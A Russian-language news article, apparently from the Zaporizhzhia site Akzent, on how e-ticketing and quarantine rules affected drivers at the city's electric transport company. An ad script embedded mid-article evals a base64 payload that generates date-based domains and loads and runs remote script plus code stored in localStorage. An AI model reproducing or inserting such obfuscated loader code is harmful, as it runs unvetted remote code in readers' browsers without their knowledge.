Как сказался карантин и внедрение э-билета на работе “Запорожэлектротранса”

С введением электронного билета в муниципальном транспорте и новых карантинных ограничений, работа водителей ЗЭТ легче не стала.

В Запорожье вот уже почти как 3 месяца в муниципальном транспорте работает услуга бесконтактной оплаты проезда. Одновременно с этим, после проведения местных выборов и начавшегося роста заболеваемости COVID-19, городские власти отменили бесплатный проезд для льготников-пенсионеров по возрасту.

Акцент разузнал как это все сказалось на работе “Запорожэлектротранса”. Вот что нам рассказали ряд наших источников на предприятии среди водителей, а также на самом предприятии.

Существует проблема планов. Несмотря на введение бесконтактной оплаты, планы на продажу билетов для водителей все еще остаются и не уменьшались. Некоторые водители отмечают, что выполнить план стало сложнее. Однако, говорить что все водители не выполняют планы, нельзя. В этом же нас уверяют и руководстве троллейбусного парка № 2, что на Космосе. В случае, если план по продаже билетов не выполняется, то месячная зарплата водителя уменьшается примерно на 1500-2000 грн. В основном зарплаты колеблются от 10 до 14 тысяч гривен.

Э-билет. Бесконтактная оплата. По словам наших собеседников, большинство запорожцев по-прежнему оплачивают проезд наличкой.

“У меня за смену может 10 человек валидаторами пользуется. Но и их проконтролировать нельзя. Контроль с валидаторами на линии бывает не часто (по тендеру было закуплено всего 15 таких устройств — ред.), валидатора возле кабины нет. Что там происходит внутри салона — я сказать не могу”, — рассказывает нам один из водителей.

Как в Запорожье будет работать транспорт во время карантина в январе, — мэрия бесконтактная оплата пока не стала популярной среди запорожцев

В итоге это может приводить к хитростям со стороны пассажиров.

“Заходят и говорят, что оплатят через валидатор. А сами не платят конечно. Спрашиваю за билет у пассажира. Говорит, я оплатил через телефон. Говорю, так валидаторы в салоне не работают, никто не смог, а вы смогли? Как так? — рассказывает нам другой водитель.
var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

К слову, случаи отказа в работе валидаторов не редки по утверждению водителей — карточки не считываются и деньги не снимаются. В тоже время на ЗЭТ подтверждают, что случаи технических сбоев бывают, однако на них оперативно реагируют инженеры Приватбанка, который предоставляет услугу. Специалисты выезжают на такие случаи и настраивают устройства.

Кроме того, по имеющейся информации в “ЗЭТ” намерены возле кабины водителей устанавливать уже другие валидаторы (изначально планировались такие, которые смогут выдавать разовые билеты). Однако когда они появятся — неизвестно. Нет пока на остановках города и прописанных в тендере минимум 16 терминалов для покупки разовых э-билетов.

Кондукторы. Теперь их просто нет, нигде. Некоторые кондукторы перешли на работу контролеров, часть перевели на другие хоз. должности на предприятии. Отсутствие кондукторов усложняет работу водителей на маршрутах, ведь нужно постоянно следить за ситуацией на дорогах и обилечивать пассажиров.

Карантин и перевозка пассажиров. По словам наших собеседников, пока водителей не штрафуют за “лишних” пассажиров. Разрешена перевозка, напомним, только в количестве мест для сидения. Да и большинство стараются не нарушать данное требование. В тоже время, есть пенсионеры по возрасту, которые по-прежнему пытаются проехать бесплатно, несмотря на отмену такой возможности городскими властями. Что в свою очередь приводит к конфликтам с водителями. Конфликтуют нередко и из-за защитных масок. Часть пассажиров не хотят ими пользоваться принципиально.

Выводы

Переходной период по внедрению э-билета и бесконтактной оплаты проезда по факту так и не завершен. Говорить об успешности и популярности такой услуги, пока также не приходится. Выходом могло бы стать внедрение “карты запорожца” по примеру Киева. В такой ситуации водители были бы полностью освобождены от продажи билетов, что значительно облегчило бы им работу на линии и избавило бы от многих конфликтов с пассажирами. Карантин также добавил финансовых проблем “Запорожэлектротрансу”. Уменьшение количества перевозимых пассажиров снижает доходы и так убыточного предприятия. По состоянию на конец 2020 года финансовые дотации “ЗЭТу” из городского бюджета составили уже рекордные 345 миллионов гривен. Также на плечи горбюджета, а значит и налогоплательщиков Запорожья, ложатся и многомиллионные выплаты по лизингу за поставленные 85 автобусов МАЗ и 5 троллейбусов Дніпро с автономным ходом.

В Запорожье трещит плотина ДнепроГЭС: автобусам и троллейбусам запретили ездить по одной из полос (ВИДЕО) Подписывайтесь на Акцент в

(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/kak-skazalsya-karantin-i-vvedenie-e-bileta-na-rabote-zaporozhelektrotransa/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top